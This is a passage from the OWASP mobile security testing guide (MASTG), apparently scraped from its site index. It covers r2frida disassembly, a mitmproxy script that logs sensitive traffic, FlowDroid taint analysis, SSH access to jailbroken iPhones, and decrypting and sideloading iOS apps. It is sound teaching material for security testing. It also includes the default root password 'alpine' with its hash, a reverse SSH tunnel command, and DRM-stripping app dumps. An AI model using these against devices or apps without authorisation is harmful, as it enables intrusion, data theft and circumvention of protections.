[0x7d1c49954c]> pdf\n ;-- sym.fun.Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI:\n\u256d (fcn) fcn.7d1c49954c 18\n\u2502 fcn.7d1c49954c (int32_t arg_40f942h);\n\u2502 ; arg int32_t arg_40f942h @ x29+0x40f942\n\u2502 0x7d1c49954c 080040f9 ldr x8, [x0]\n\u2502 0x7d1c499550 01000090 adrp x1, 0x7d1c499000\n\u2502 0x7d1c499554 21801591 add x1, x1, 0x560 ; hit0_4\n\u2502 0x7d1c499558 029d42f9 ldr x2, [x8, 0x538] ; [0x538:4]=-1 ; 1336\n\u2502 0x7d1c49955c 4000 invalid\n
Note that the line tagged with ; hit0_4
corresponds to the string that we've previously found: 0x7d1c499560 hit0_4 Hello from C++
.
To learn more, please refer to the r2frida wiki.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0100/","title":"Logging Sensitive Data from Network Traffic","text":"mitmproxy can be used to intercept network traffic from Android apps. This technique is useful for identifying sensitive data that is sent over the network, as well as for identifying potential security vulnerabilities.
Once you have mitmproxy installed and your device configured to use it, you can create a Python script to filter the traffic and extract the sensitive data. For example, the following script will extract all the data sent in the requests and responses only if the data is considered sensitive. For this example we consider sensitive data to be any data that contains the strings \"dummyPassword\" or \"sampleUser\", so we include them in the SENSITIVE_STRINGS
list.
# mitm_sensitive_logger.py\n\nfrom mitmproxy import http\n\n# This data would come from another file and should be defined after identifying the data that is considered sensitive for this application.\n# For example by using the Google Play Store Data Safety section.\nSENSITIVE_DATA = {\n \"precise_location_latitude\": \"37.7749\",\n \"precise_location_longitude\": \"-122.4194\",\n \"name\": \"John Doe\",\n \"email_address\": \"john.doe@example.com\",\n \"phone_number\": \"+11234567890\",\n \"credit_card_number\": \"1234 5678 9012 3456\"\n}\n\nSENSITIVE_STRINGS = SENSITIVE_DATA.values()\n\ndef contains_sensitive_data(string):\n return any(sensitive in string for sensitive in SENSITIVE_STRINGS)\n\ndef process_flow(flow):\n url = flow.request.pretty_url\n request_headers = flow.request.headers\n request_body = flow.request.text\n response_headers = flow.response.headers if flow.response else \"No response\"\n response_body = flow.response.text if flow.response else \"No response\"\n\n if (contains_sensitive_data(url) or \n contains_sensitive_data(request_body) or \n contains_sensitive_data(response_body)):\n with open(\"sensitive_data.log\", \"a\") as file:\n if flow.response:\n file.write(f\"RESPONSE URL: {url}\\n\")\n file.write(f\"Response Headers: {response_headers}\\n\")\n file.write(f\"Response Body: {response_body}\\n\\n\")\n else:\n file.write(f\"REQUEST URL: {url}\\n\")\n file.write(f\"Request Headers: {request_headers}\\n\")\n file.write(f\"Request Body: {request_body}\\n\\n\")\ndef request(flow: http.HTTPFlow):\n process_flow(flow)\n\ndef response(flow: http.HTTPFlow):\n process_flow(flow)\n
Now you can run mitmproxy with the script:
mitmdump -s mitm_sensitive_logger.py\n
Our example app has this code:
fun testPostRequest() {\n val thread = Thread {\n try {\n val url = URL(\"https://httpbin.org/post\")\n val httpURLConnection = url.openConnection() as HttpURLConnection\n httpURLConnection.requestMethod = \"POST\"\n httpURLConnection.doOutput = true\n httpURLConnection.setRequestProperty(\"Content-Type\", \"application/x-www-form-urlencoded\")\n\n val user = \"sampleUser\"\n val password = \"dummyPassword\"\n\n val postData = \"username=$user&password=$password\"\n\n val outputStream = BufferedOutputStream(httpURLConnection.outputStream)\n val bufferedWriter = BufferedWriter(OutputStreamWriter(outputStream, \"UTF-8\"))\n bufferedWriter.write(postData)\n bufferedWriter.flush()\n bufferedWriter.close()\n outputStream.close()\n\n val responseCode = httpURLConnection.responseCode\n if (responseCode == HttpURLConnection.HTTP_OK) {\n Log.d(\"HTTP_SUCCESS\", \"Successfully authenticated.\")\n } else {\n Log.e(\"HTTP_ERROR\", \"Failed to authenticate. Response code: $responseCode\")\n }\n\n } catch (e: Exception) {\n e.printStackTrace()\n }\n }\n thread.start()\n}\n
The app sends a POST request to https://httpbin.org/post
with the body username=sampleUser&password=dummyPassword
. httpbin.org
is a website that returns the request data in the response body, so we can see the data that was sent in the request.
Run the app and use it as you normally would. The script will log any sensitive data that is sent over the network to the sensitive_data.log
file.
Example console output:
[10:07:59.348] Loading script mitm_sensitive_logger.py\n[10:07:59.351] HTTP(S) proxy listening at *:8080.\n[10:08:08.188][127.0.0.1:64701] server connect httpbin.org:443 (52.206.94.89:443)\n[10:08:08.192][127.0.0.1:64709] server connect mas.owasp.org:443 (104.22.27.77:443)\n[10:08:08.245][127.0.0.1:64709] Client TLS handshake failed. The client does not trust the proxy's certificate for mas.owasp.org (OpenSSL Error([('SSL routines', '', 'ssl/tls alert certificate unknown')]))\n[10:08:08.246][127.0.0.1:64709] client disconnect\n[10:08:08.246][127.0.0.1:64709] server disconnect mas.owasp.org:443 (104.22.27.77:443)\n127.0.0.1:64701: POST https://httpbin.org/post\n << 200 OK 548b\n
Example sensitive_data.log
output:
REQUEST URL: https://httpbin.org/post\nRequest Headers: Headers[(b'Content-Type', b'application/x-www-form-urlencoded'), (b'User-Agent', b'Dalvik/2.1.0 (Linux; U; Android 13; sdk_gphone64_arm64 Build/TE1A.220922.021)'), (b'Host', b'httpbin.org'), (b'Connection', b'Keep-Alive'), (b'Accept-Encoding', b'gzip'), (b'Content-Length', b'42')]\nRequest Body: username=sampleUser&password=dummyPassword\n\nRESPONSE URL: https://httpbin.org/post\nResponse Headers: Headers[(b'Date', b'Tue, 16 Jan 2024 09:08:08 GMT'), (b'Content-Type', b'application/json'), (b'Content-Length', b'548'), (b'Connection', b'keep-alive'), (b'Server', b'gunicorn/19.9.0'), (b'Access-Control-Allow-Origin', b'*'), (b'Access-Control-Allow-Credentials', b'true')]\nResponse Body: {\n \"args\": {}, \n \"data\": \"\", \n \"files\": {}, \n \"form\": {\n \"password\": \"dummyPassword\", \n \"username\": \"sampleUser\"\n }, \n \"headers\": {\n \"Accept-Encoding\": \"gzip\", \n \"Content-Length\": \"42\", \n \"Content-Type\": \"application/x-www-form-urlencoded\", \n \"Host\": \"httpbin.org\", \n \"User-Agent\": \"Dalvik/2.1.0 (Linux; U; Android 13; sdk_gphone64_arm64 Build/TE1A.220922.021)\", \n \"X-Amzn-Trace-Id\": \"Root=1-65a64778-78495e9f5d742c9b0c7a75d8\"\n }, \n \"json\": null, \n \"origin\": \"148.141.65.87\", \n \"url\": \"https://httpbin.org/post\"\n}\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0108/","title":"Taint Analysis","text":"Taint analysis is an information flow analysis technique that tracks the flow of sensitive information within a program. For example, it can determine whether geolocation data collected in an Android app is being transmitted to third-party domains.
In taint analysis, data flows from a \"source\" to a \"sink\". A source is where sensitive information originates, and a sink is where this information is ultimately utilized. For instance, we can determine if the device ID retrieved by a getDeviceId()
function is transmitted as a text message via another function sendTextMessage()
. In this scenario, getDeviceId()
is the source, and sendTextMessage()
is the sink. If a direct path exists between them, it's called a leak.
In large applications, manual information flow analysis can be very time-consuming and inaccurate. Taint analysis automates this, with two main methods: static and dynamic. The former examines code without running it, offering broad coverage but potentially yielding false positives. In contrast, dynamic analysis observes real-time application execution, providing actual context but possibly overlooking untriggered issues. A thorough comparison of these techniques is beyond this section's scope.
There are multiple tools which perform taint analysis on native code, including Triton and bincat. However, in this section, we'll primarily focus on Android Java code and utilize FlowDroid for the taint analysis. Another notable tool supporting taint analysis for Android apps is GDA.
For our demonstration, we'll use the FlowDroid command line tool to perform taint analysis on the InsecureShop v1.0 application.
The InsecureShop app accepts a username and password as input and stores them in the app's shared preferences. In our taint analysis, we're interested in how this stored username and password are used. In this context, the username and password are the sensitive information, and reading from shared preferences is the source. The sink in this analysis could be various operations, such as sending info over the network, transmitting info via an Intent
, or storing info in an external file.
To use FlowDroid, firstly, we need to provide an input list of potential sources and sinks to evaluate for. In our case, reading from shared preferences will be the source, while adding parameters to an Intent
will be the sink. The configuration file will look as follows (we'll name it \"source_sink.txt\"):
<android.content.SharedPreferences: java.lang.String getString(java.lang.String, java.lang.String)> -> _SOURCE_\n\n<android.content.Intent: android.content.Intent putExtra(java.lang.String,java.lang.CharSequence)> -> _SINK_\n<android.content.Intent: android.content.Intent putExtra(java.lang.String,char)> -> _SINK_\n<android.content.Intent: android.content.Intent putExtra(java.lang.String,java.lang.String)> -> _SINK_\n
To invoke FlowDroid via the command line, use the following command:
java -jar soot-infoflow-cmd/target/soot-infoflow-cmd-jar-with-dependencies.jar \\\n -a InsecureShop.apk \\\n -p Android/Sdk/platforms \\\n -s source_sink.txt\n\n\n[main] INFO soot.jimple.infoflow.android.SetupApplication$InPlaceInfoflow - The sink virtualinvoke r2.<android.content.Intent: android.content.Intent putExtra(java.lang.String,java.lang.String)>(\"password\", $r5) in method <com.insecureshop.AboutUsActivity: void onSendData(android.view.View)> was called with values from the following sources:\n\n[main] INFO soot.jimple.infoflow.android.SetupApplication$InPlaceInfoflow - - $r1 = interfaceinvoke $r2.<android.content.SharedPreferences: java.lang.String getString(java.lang.String,java.lang.String)>(\"password\", \"\") in method <com.insecureshop.util.Prefs: java.lang.String getPassword()>\n\n...\n\n[main] INFO soot.jimple.infoflow.android.SetupApplication$InPlaceInfoflow - The sink virtualinvoke r2.<android.content.Intent: android.content.Intent putExtra(java.lang.String,java.lang.String)>(\"username\", $r4) in method <com.insecureshop.AboutUsActivity: void onSendData(android.view.View)> was called with values from the following sources:\n\n[main] INFO soot.jimple.infoflow.android.SetupApplication$InPlaceInfoflow - - $r1 = interfaceinvoke $r2.<android.content.SharedPreferences: java.lang.String getString(java.lang.String,java.lang.String)>(\"username\", \"\") in method <com.insecureshop.util.Prefs: java.lang.String getUsername()>\n\n...\n\n[main] INFO soot.jimple.infoflow.android.SetupApplication - Found 2 leaks\n
The output also uses the jimple intermediate representation and reveals two leaks in the application, each corresponding to the username and password. Given that the InsecureShop app is open-source, we can refer to its source code to validate the findings, as shown below:
// file: AboutActivity.kt\n\nfun onSendData(view: View) {\n val userName = Prefs.username!!\n val password = Prefs.password!!\n\n val intent = Intent(\"com.insecureshop.action.BROADCAST\")\n intent.putExtra(\"username\", userName)\n intent.putExtra(\"password\", password)\n sendBroadcast(intent)\n\n textView.text = \"InsecureShop is an intentionally designed vulnerable android app built in Kotlin.\"\n\n }\n
Taint analysis is especially beneficial for automating data flow analysis in intricate applications. However, given the complexity of some apps, the accuracy of such tools can vary. Thus, it's essential for reviewers to find a balance between the accuracy of tools and the time spent on manual analysis.
"},{"location":"MASTG/techniques/generic/MASTG-TECH-0047/","title":"Reverse Engineering","text":"Reverse engineering is the process of taking an app apart to find out how it works. You can do this by examining the compiled app (static analysis), observing the app during runtime (dynamic analysis), or a combination of both.
"},{"location":"MASTG/techniques/generic/MASTG-TECH-0048/","title":"Static Analysis","text":"For white-box source code testing, you'll need a setup similar to the developer's setup, including a test environment that includes the Android SDK and an IDE. Access to either a physical device or an emulator (for debugging the app) is recommended.
During black-box testing, you won't have access to the original form of the source code. You'll usually have the application package in Android's APK format, which can be installed on an Android device or reverse engineered as explained in the section \"Disassembling and Decompiling\".
"},{"location":"MASTG/techniques/generic/MASTG-TECH-0049/","title":"Dynamic Analysis","text":"Dynamic Analysis tests the mobile app by executing and running the app binary and analyzing its workflows for vulnerabilities. For example, vulnerabilities regarding data storage might sometimes be hard to catch during static analysis, but in dynamic analysis you can easily spot what information is stored persistently and if the information is protected properly. Besides this, dynamic analysis allows the tester to properly identify:
Analysis can be assisted by automated tools, such as MobSF, while assessing an application. An application can be assessed by side-loading it, re-packaging it, or by simply attacking the installed version.
"},{"location":"MASTG/techniques/generic/MASTG-TECH-0049/#basic-information-gathering","title":"Basic Information Gathering","text":"As mentioned previously, Android runs on top of a modified Linux kernel and retains the proc filesystem (procfs) from Linux, which is mounted at /proc
. Procfs provides a directory-based view of a process running on the system, providing detailed information about the process itself, its threads, and other system-wide diagnostics. Procfs is arguably one of the most important filesystems on Android, where many OS native tools depend on it as their source of information.
Many command line tools are not shipped with the Android firmware to reduce the size, but can be easily installed on a rooted device using BusyBox. We can also create our own custom scripts using commands like cut
, grep
, sort
etc, to parse the proc filesystem information.
In this section, we will be using information from procfs directly or indirectly to gather information about a running process.
"},{"location":"MASTG/techniques/generic/MASTG-TECH-0050/","title":"Binary Analysis","text":"Binary analysis frameworks give you powerful ways to automate tasks that would be almost impossible to do manually. Binary analysis frameworks typically use a technique called symbolic execution, which allows you to determine the conditions necessary to reach a specific target. It translates the program's semantics into a logical formula in which some variables are represented by symbols with specific constraints. By resolving the constraints, you can find the conditions necessary for the execution of some branch of the program.
"},{"location":"MASTG/techniques/generic/MASTG-TECH-0051/","title":"Tampering and Runtime Instrumentation","text":"First, we'll look at some simple ways to modify and instrument mobile apps. Tampering means making patches or runtime changes to the app to affect its behavior. For example, you may want to deactivate SSL pinning or binary protections that hinder the testing process. Runtime Instrumentation encompasses adding hooks and runtime patches to observe the app's behavior. In mobile application security however, the term loosely refers to all kinds of runtime manipulation, including overriding methods to change behavior.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0052/","title":"Accessing the Device Shell","text":"One of the most common things you do when testing an app is accessing the device shell. In this section we'll see how to access the iOS shell both remotely from your host computer with/without a USB cable and locally from the device itself.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0052/#remote-shell","title":"Remote Shell","text":"In contrast to Android where you can easily access the device shell using the adb tool, on iOS you only have the option to access the remote shell via SSH. This also means that your iOS device must be jailbroken in order to connect to its shell from your host computer. For this section we assume that you've properly jailbroken your device and have either Cydia (see screenshot below) or Sileo installed. In the rest of the guide we will refer to Cydia, but the same packages should be available in Sileo.
In order to enable SSH access to your iOS device you can install the OpenSSH package. Once installed, be sure to connect both devices to the same Wi-Fi network and take a note of the device IP address, which you can find in the Settings -> Wi-Fi menu and tapping once on the info icon of the network you're connected to.
You can now access the remote device's shell by running ssh root@<device_ip_address>
, which will log you in as the root user:
$ ssh root@192.168.197.234\nroot@192.168.197.234's password:\niPhone:~ root#\n
Press Control + D or type exit
to quit.
When accessing your iOS device via SSH consider the following:
root
and mobile
.alpine
.Remember to change the default password for both users root
and mobile
as anyone on the same network can find the IP address of your device and connect via the well-known default password, which will give them root access to your device.
If you forget your password and want to reset it to the default alpine
:
/private/etc/master.passwd
on your jailbroken iOS device (using an on-device shell as shown below) root:xxxxxxxxx:0:0::0:0:System Administrator:/var/root:/bin/sh\n mobile:xxxxxxxxx:501:501::0:0:Mobile User:/var/mobile:/bin/sh\n
xxxxxxxxx
to /smx7MYTQIi2M
(which is the hashed password alpine
)During a real black box test, a reliable Wi-Fi connection may not be available. In this situation, you can use usbmuxd to connect to your device's SSH server via USB.
Connect macOS to an iOS device by installing and starting iproxy:
$ brew install libimobiledevice\n$ iproxy 2222 22\nwaiting for connection\n
The above command maps port 22
on the iOS device to port 2222
on localhost. You can also make iproxy run automatically in the background if you don't want to run the binary every time you want to SSH over USB.
With the following command in a new terminal window, you can connect to the device:
$ ssh -p 2222 root@localhost\nroot@localhost's password:\niPhone:~ root#\n
Small note on USB of an iDevice: on an iOS device you cannot make data connections anymore after 1 hour of being in a locked state, unless you unlock it again due to the USB Restricted Mode, which was introduced with iOS 11.4.1
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0052/#on-device-shell-app","title":"On-device Shell App","text":"While usually using an on-device shell (terminal emulator) might be very tedious compared to a remote shell, it can prove handy for debugging in case of, for example, network issues, or to check some configuration. For example, you can install NewTerm 2 via Cydia for this purpose (it supports iOS 6.0 to 12.1.2 at the time of this writing).
In addition, there are a few jailbreaks that explicitly disable incoming SSH for security reasons. In those cases, it is very convenient to have an on-device shell app, which you can use to first SSH out of the device with a reverse shell, and then connect from your host computer to it.
Opening a reverse shell over SSH can be done by running the command ssh -R <remote_port>:localhost:22 <username>@<host_computer_ip>
.
On the on-device shell app run the following command and, when asked, enter the password of the mstg
user of the host computer:
ssh -R 2222:localhost:22 mstg@192.168.197.235\n
On your host computer run the following command and, when asked, enter the password of the root
user of the iOS device:
ssh -p 2222 root@localhost\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0053/","title":"Host-Device Data Transfer","text":"There might be various scenarios where you might need to transfer data from the iOS device or app data sandbox to your host computer or vice versa. The following section will show you different ways on how to achieve that.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0053/#copying-app-data-files-via-ssh-and-scp","title":"Copying App Data Files via SSH and SCP","text":"As we know now, files from our app are stored in the Data directory. You can now simply archive the Data directory with tar
and pull it from the device with scp
:
iPhone:~ root# tar czvf /tmp/data.tgz /private/var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693\niPhone:~ root# exit\n$ scp -P 2222 root@localhost:/tmp/data.tgz .\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0053/#grapefruit","title":"Grapefruit","text":"After starting Grapefruit you can select the app that is in scope for testing. There are various functions available, of which one is called \"Finder\". When selecting it, you will get a listing of the directories of the app sandbox.
When navigating through the directories and selecting a file, a pop-up will show up and display the data either as hexadecimal or text. When closing this pop-up you have various options available for the file, including:
When you are starting objection you will find the prompt within the Bundle directory.
org.owasp.MSTG on (iPhone: 10.3.3) [usb] # pwd print\nCurrent directory: /var/containers/Bundle/Application/DABF849D-493E-464C-B66B-B8B6C53A4E76/org.owasp.MSTG.app\n
Use the env
command to get the directories of the app and navigate to the Documents directory.
org.owasp.MSTG on (iPhone: 10.3.3) [usb] # cd /var/mobile/Containers/Data/Application/72C7AAFB-1D75-4FBA-9D83-D8B4A2D44133/Documents\n/var/mobile/Containers/Data/Application/72C7AAFB-1D75-4FBA-9D83-D8B4A2D44133/Documents\n
With the command file download <filename>
you can download a file from the iOS device to your host computer and can analyze it afterwards.
org.owasp.MSTG on (iPhone: 10.3.3) [usb] # file download .com.apple.mobile_container_manager.metadata.plist\nDownloading /var/mobile/Containers/Data/Application/72C7AAFB-1D75-4FBA-9D83-D8B4A2D44133/.com.apple.mobile_container_manager.metadata.plist to .com.apple.mobile_container_manager.metadata.plist\nStreaming file from device...\nWriting bytes to destination...\nSuccessfully downloaded /var/mobile/Containers/Data/Application/72C7AAFB-1D75-4FBA-9D83-D8B4A2D44133/.com.apple.mobile_container_manager.metadata.plist to .com.apple.mobile_container_manager.metadata.plist\n
You can also upload files to the iOS device with file upload <local_file_path>
.
During development, apps are sometimes provided to testers via over-the-air (OTA) distribution. In that situation, you'll receive an itms-services link, such as the following:
itms-services://?action=download-manifest&url=https://s3-ap-southeast-1.amazonaws.com/test-uat/manifest.plist\n
You can use the ITMS services asset downloader tool to download the IPA from an OTA distribution URL. Install it via npm:
npm install -g itms-services\n
Save the IPA file locally with the following command:
# itms-services -u \"itms-services://?action=download-manifest&url=https://s3-ap-southeast-1.amazonaws.com/test-uat/manifest.plist\" -o - > out.ipa\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0054/#extracting-the-app-binary","title":"Extracting the App Binary","text":"If you have an IPA with a decrypted app binary, unzip it and you are ready to go. The app binary is located in the main bundle directory (.app), e.g. Payload/Telegram X.app/Telegram X
. See the following subsection for details on the extraction of the property lists.
On macOS's Finder, .app directories are opened by right-clicking them and selecting \"Show Package Content\". On the terminal you can just cd
into them.
IMPORTANT NOTE: In the United States, the Digital Millennium Copyright Act 17 U.S.C. 1201, or DMCA, makes it illegal and actionable to circumvent certain types of DRM. However, the DMCA also provides exemptions, such as for certain kinds of security research. A qualified attorney can help you determine if your research qualifies under the DMCA exemptions. (Source: Corellium)
If you don't have the original IPA, then you need a jailbroken device where you will install the app (e.g. via App Store). Once installed, you need to extract the app binary from memory and rebuild the IPA file. Because of DRM, the app binary file is encrypted when it is stored on the iOS device, so simply pulling it from the Bundle (either through SSH or Objection) will not be sufficient to reverse engineer it.
You can verify this by running this command on the app binary:
otool -l Payload/Telegram X.app/Telegram X | grep -i LC_ENCRYPTION -B1 -A4\nLoad command 12\n cmd LC_ENCRYPTION_INFO\n cmdsize 20\n cryptoff 16384\n cryptsize 32768\n cryptid 1\n
Or with radare2:
rabin2 -I Payload/Telegram X.app/Telegram X | grep crypto\ncrypto true\n
In order to retrieve the unencrypted version, you can use frida-ios-dump. It will extract the unencrypted version from memory while the application is running on the device.
First, configure Frida-ios-dump dump.py
:
localhost
with port 2222
when using iproxy, or to the actual IP address and port of the device from which you want to dump the binary.User = 'root'
) and password (Password = 'alpine'
) in dump.py
to the ones you have set.Enumerate the apps installed on the device by running python dump.py -l
:
PID Name Identifier\n---- --------------- -------------------------------------\n 860 Cydia com.saurik.Cydia\n1130 Settings com.apple.Preferences\n 685 Mail com.apple.mobilemail\n 834 Telegram ph.telegra.Telegraph\n - Stocks com.apple.stocks\n ...\n
You can dump the selected app, for example Telegram, by running python dump.py ph.telegra.Telegraph
After a couple of seconds, the Telegram.ipa
file will be created in your current directory. You can validate the success of the dump by removing the app and reinstalling it (e.g. using ios-deploy ios-deploy -b Telegram.ipa
). Note that this will only work on jailbroken devices, as otherwise the signature won't be valid.
You can verify that the app binary is now unencrypted:
rabin2 -I Payload/Telegram X.app/Telegram X | grep crypto\ncrypto false\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0054/#thinning-the-app-binary","title":"Thinning the App Binary","text":"The app binary may contain multiple architectures, such as armv7
(32-bit) and arm64
(64-bit). That is called a \"fat binary\".
One example is the Damn Vulnerable iOS App DVIA v1 to demonstrate this.
Unzip the app and run otool:
unzip DamnVulnerableiOSApp.ipa\ncd Payload/DamnVulnerableIOSApp.app\notool -hv DamnVulnerableIOSApp\n
The output will look like this:
DamnVulnerableIOSApp (architecture armv7):\nMach header\n magic cputype cpusubtype caps filetype ncmds sizeofcmds flags\n MH_MAGIC ARM V7 0x00 EXECUTE 33 3684 NOUNDEFS DYLDLINK TWOLEVEL PIE\nDamnVulnerableIOSApp (architecture arm64):\nMach header\n magic cputype cpusubtype caps filetype ncmds sizeofcmds flags\nMH_MAGIC_64 ARM64 ALL 0x00 EXECUTE 33 4192 NOUNDEFS DYLDLINK TWOLEVEL PIE\n
To ease the app analysis, it's recommended to create a so-called thin binary, which contains one architecture only:
lipo -thin armv7 DamnVulnerableIOSApp -output DVIA32\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0055/","title":"Repackaging Apps","text":"If you need to test on a non-jailbroken device you should learn how to repackage an app to enable dynamic testing on it.
Use a computer with macOS to perform all the steps indicated in the article \"Patching iOS Applications\" from the objection Wiki. Once you're done you'll be able to patch an IPA by calling the objection command:
objection patchipa --source my-app.ipa --codesign-signature 0C2E8200Dxxxx\n
Finally, the app needs to be installed (sideloaded) and run with debugging communication enabled. Perform the steps from the article \"Running Patched iOS Applications\" from the objection Wiki (using ios-deploy).
ios-deploy --bundle Payload/my-app.app -W -d\n
Refer to \"Installing Apps\" to learn about other installation methods. Some of them don't require you to have macOS.
This repackaging method is enough for most use cases. For more advanced repackaging, refer to \"iOS Tampering and Reverse Engineering - Patching, Repackaging and Re-Signing\".
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0056/","title":"Installing Apps","text":"When you install an application without using Apple's App Store, this is called sideloading. There are various ways of sideloading which are described below. On the iOS device, the actual installation process is then handled by the installd daemon, which will unpack and install the application. To integrate app services or be installed on an iOS device, all applications must be signed with a certificate issued by Apple. This means that the application can be installed only after successful code signature verification. On a jailbroken phone, however, you can circumvent this security feature with AppSync, a package available in the Cydia store. It contains numerous useful applications that leverage jailbreak-provided root privileges to execute advanced functionality. AppSync is a tweak that patches installd, allowing the installation of fake-signed IPA packages.
Different methods exist for installing an IPA package onto an iOS device, which are described in detail below.
Please note that iTunes is no longer available in macOS Catalina. If you are using an older version of macOS, iTunes is still available but since iTunes 12.7 it is not possible to install apps.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0056/#cydia-impactor","title":"Cydia Impactor","text":"Cydia Impactor was originally created to jailbreak iPhones, but has been rewritten to sign and install IPA packages to iOS devices via sideloading (and even APK files to Android devices). Cydia Impactor is available for Windows, macOS and Linux. A step by step guide and troubleshooting steps are available on yalujailbreak.net.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0056/#libimobiledevice","title":"libimobiledevice","text":"On Linux and also macOS, you can alternatively use libimobiledevice, a cross-platform software protocol library and a set of tools for native communication with iOS devices. This allows you to install apps over a USB connection by executing ideviceinstaller. The connection is implemented with the USB multiplexing daemon usbmuxd, which provides a TCP tunnel over USB.
The package for libimobiledevice will be available in your Linux package manager. On macOS you can install libimobiledevice via brew:
brew install libimobiledevice\nbrew install ideviceinstaller\n
After the installation you have several new command line tools available, such as ideviceinfo
, ideviceinstaller
or idevicedebug
.
# The following command will show detailed information about the iOS device connected via USB.\n$ ideviceinfo\n# The following command will install the IPA to your iOS device.\n$ ideviceinstaller -i iGoat-Swift_v1.0-frida-codesigned.ipa\n...\nInstall: Complete\n# The following command will start the app in debug mode, by providing the bundle name. The bundle name can be found in the previous command after \"Installing\".\n$ idevicedebug -d run OWASP.iGoat-Swift\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0056/#ipainstaller","title":"ipainstaller","text":"The IPA can also be directly installed on the iOS device via the command line with ipainstaller. After copying the file over to the device, for example via scp, you can execute ipainstaller with the IPA's filename:
ipainstaller App_name.ipa\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0056/#ios-deploy","title":"ios-deploy","text":"On macOS you can also use the ios-deploy tool to install iOS apps from the command line. You'll need to unzip your IPA since ios-deploy uses the app bundles to install apps.
unzip Name.ipa\nios-deploy --bundle 'Payload/Name.app' -W -d -v\n
After the app is installed on the iOS device, you can simply start it by adding the -m
flag which will directly start debugging without installing the app again.
ios-deploy --bundle 'Payload/Name.app' -W -d -v -m\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0056/#xcode","title":"Xcode","text":"It is also possible to use the Xcode IDE to install iOS apps by doing the following steps:
Sometimes an application may require an iPad device. If you only have iPhone or iPod touch devices, you can force the application to be installed and used on these kinds of devices. You can do this by changing the value of the property UIDeviceFamily to the value 1 in the Info.plist file.
<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n\n <key>UIDeviceFamily</key>\n <array>\n <integer>1</integer>\n </array>\n\n</dict>\n</plist> \n
It is important to note that changing this value will break the original signature of the IPA file so you need to re-sign the IPA, after the update, in order to install it on a device on which the signature validation has not been disabled.
This bypass might not work if the application requires capabilities that are specific to modern iPads while your iPhone or iPod is a bit older.
Possible values for the property UIDeviceFamily can be found in the Apple Developer documentation.
One fundamental step when analyzing apps is information gathering. This can be done by inspecting the app package on your host computer or remotely by accessing the app data on the device. You'll find more advanced techniques in the subsequent chapters but, for now, we will focus on the basics: getting a list of all installed apps, exploring the app package and accessing the app data directories on the device itself. This should give you a bit of context about what the app is all about without even having to reverse engineer it or perform more advanced analysis. We will be answering questions such as:
When targeting apps that are installed on the device, you'll first have to figure out the correct bundle identifier of the application you want to analyze. You can use frida-ps -Uai
to get all apps (-a
) currently installed (-i
) on the connected USB device (-U
):
$ frida-ps -Uai\n PID Name Identifier\n---- ------------------- -----------------------------------------\n6847 Calendar com.apple.mobilecal\n6815 Mail com.apple.mobilemail\n - App Store com.apple.AppStore\n - Apple Store com.apple.store.Jolly\n - Calculator com.apple.calculator\n - Camera com.apple.camera\n - iGoat-Swift OWASP.iGoat-Swift\n
It also shows which of them are currently running. Take a note of the \"Identifier\" (bundle identifier) and the PID if any as you'll need them afterwards.
You can also directly open Grapefruit and after selecting your iOS device you'll get the list of installed apps.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0058/","title":"Exploring the App Package","text":"Once you have collected the package name of the application you want to target, you'll want to start gathering information about it. First, retrieve the IPA as explained in Basic Testing Operations - Obtaining and Extracting Apps.
You can unzip the IPA using the standard unzip
or any other ZIP utility. Inside you'll find a Payload
folder containing the so-called Application Bundle (.app). The following is an example output; note that it was truncated for better readability and overview:
$ ls -1 Payload/iGoat-Swift.app\nrutger.html\nmansi.html\nsplash.html\nabout.html\n\nLICENSE.txt\nSentinel.txt\nREADME.txt\n\nURLSchemeAttackExerciseVC.nib\nCutAndPasteExerciseVC.nib\nRandomKeyGenerationExerciseVC.nib\nKeychainExerciseVC.nib\nCoreData.momd\narchived-expanded-entitlements.xcent\nSVProgressHUD.bundle\n\nBase.lproj\nAssets.car\nPkgInfo\n_CodeSignature\nAppIcon60x60@3x.png\n\nFrameworks\n\nembedded.mobileprovision\n\nCredentials.plist\nAssets.plist\nInfo.plist\n\niGoat-Swift\n
The most relevant items are:
Info.plist
contains configuration information for the application, such as its bundle ID, version number, and display name._CodeSignature/
contains a plist file with a signature over all files in the bundle.Frameworks/
contains the app native libraries as .dylib or .framework files.PlugIns/
may contain app extensions as .appex files (not present in the example).*.nib
files (storing the user interfaces of iOS app), localized content (<language>.lproj
), text files, audio files, etc.The information property list or Info.plist
(named by convention) is the main source of information for an iOS app. It consists of a structured file containing key-value pairs describing essential configuration information about the app. Actually, all bundled executables (app extensions, frameworks and apps) are expected to have an Info.plist
file. You can find all possible keys in the Apple Developer Documentation.
The file might be formatted in XML or binary (bplist). You can convert it to XML format with one simple command:
plutil
, which is a tool that comes natively with macOS 10.2 and above versions (no official online documentation is currently available):plutil -convert xml1 Info.plist\n
apt install libplist-utils\nplistutil -i Info.plist -o Info_xml.plist\n
Here's a non-exhaustive list of some info and the corresponding keywords that you can easily search for in the Info.plist
file by just inspecting the file or by using grep -i <keyword> Info.plist
:
UsageDescription
(see \"iOS Platform APIs\")CFBundleURLTypes
(see \"iOS Platform APIs\")UTExportedTypeDeclarations
/ UTImportedTypeDeclarations
(see \"iOS Platform APIs\")NSAppTransportSecurity
